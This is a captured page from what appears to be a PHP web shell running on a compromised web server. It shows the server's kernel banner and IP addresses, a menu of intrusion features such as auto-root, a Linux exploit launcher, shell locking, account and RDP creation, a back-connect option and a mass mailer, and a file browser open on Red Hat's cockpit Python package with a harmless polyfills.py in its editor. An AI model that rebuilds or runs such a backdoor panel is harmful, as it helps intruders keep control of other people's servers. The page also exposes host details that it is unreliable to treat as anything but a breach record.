Linux salto.nuvemidc.com 5.14.0-687.42.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Aug 27 11:55:12 EDT 2026 x86_64
LiteSpeed
: 177.73.233.61 | : 216.73.217.116
Cant Read [ /etc/named.conf ]
7.4.33
agenci18
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3.9 /
site-packages /
cockpit /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
_vendor
[ DIR ]
drwxr-xr-x
channels
[ DIR ]
drwxr-xr-x
data
[ DIR ]
drwxr-xr-x
__init__.py
113
B
-rw-r--r--
_version.py
22
B
-rw-r--r--
beiboot.py
21.22
KB
-rw-r--r--
beipack.py
2.38
KB
-rw-r--r--
bridge.py
11.67
KB
-rw-r--r--
channel.py
21.71
KB
-rw-r--r--
config.py
2.76
KB
-rw-r--r--
internal_endpoints.py
5.34
KB
-rw-r--r--
jsonutil.py
6.81
KB
-rw-r--r--
osinfo.py
1019
B
-rw-r--r--
packages.py
23.14
KB
-rw-r--r--
peer.py
11.96
KB
-rw-r--r--
polkit.py
8.43
KB
-rw-r--r--
polyfills.py
1.66
KB
-rw-r--r--
protocol.py
8.91
KB
-rw-r--r--
remote.py
8.32
KB
-rw-r--r--
router.py
9.47
KB
-rw-r--r--
samples.py
16.41
KB
-rw-r--r--
superuser.py
12.09
KB
-rw-r--r--
transports.py
17.49
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : polyfills.py
# # Copyright (C) 2023 Red Hat, Inc. # SPDX-License-Identifier: GPL-3.0-or-later import contextlib import socket def install(): """Add shims for older Python versions""" # introduced in 3.9 if not hasattr(socket, 'recv_fds'): import _socket import array def recv_fds(sock, bufsize, maxfds, flags=0): fds = array.array("i") msg, ancdata, flags, addr = sock.recvmsg(bufsize, _socket.CMSG_LEN(maxfds * fds.itemsize)) for cmsg_level, cmsg_type, cmsg_data in ancdata: if (cmsg_level == _socket.SOL_SOCKET and cmsg_type == _socket.SCM_RIGHTS): fds.frombytes(cmsg_data[:len(cmsg_data) - (len(cmsg_data) % fds.itemsize)]) return msg, list(fds), flags, addr socket.recv_fds = recv_fds # introduced in 3.7 if not hasattr(contextlib, 'AsyncExitStack'): class AsyncExitStack: async def __aenter__(self): self.cms = [] self.async_cms = [] return self async def enter_async_context(self, cm): result = await cm.__aenter__() self.async_cms.append(cm) return result def enter_context(self, cm): result = cm.__enter__() self.cms.append(cm) return result async def __aexit__(self, exc_type, exc_value, traceback): for cm in self.async_cms: cm.__aexit__(exc_type, exc_value, traceback) for cm in self.cms: cm.__exit__(exc_type, exc_value, traceback) contextlib.AsyncExitStack = AsyncExitStack
Close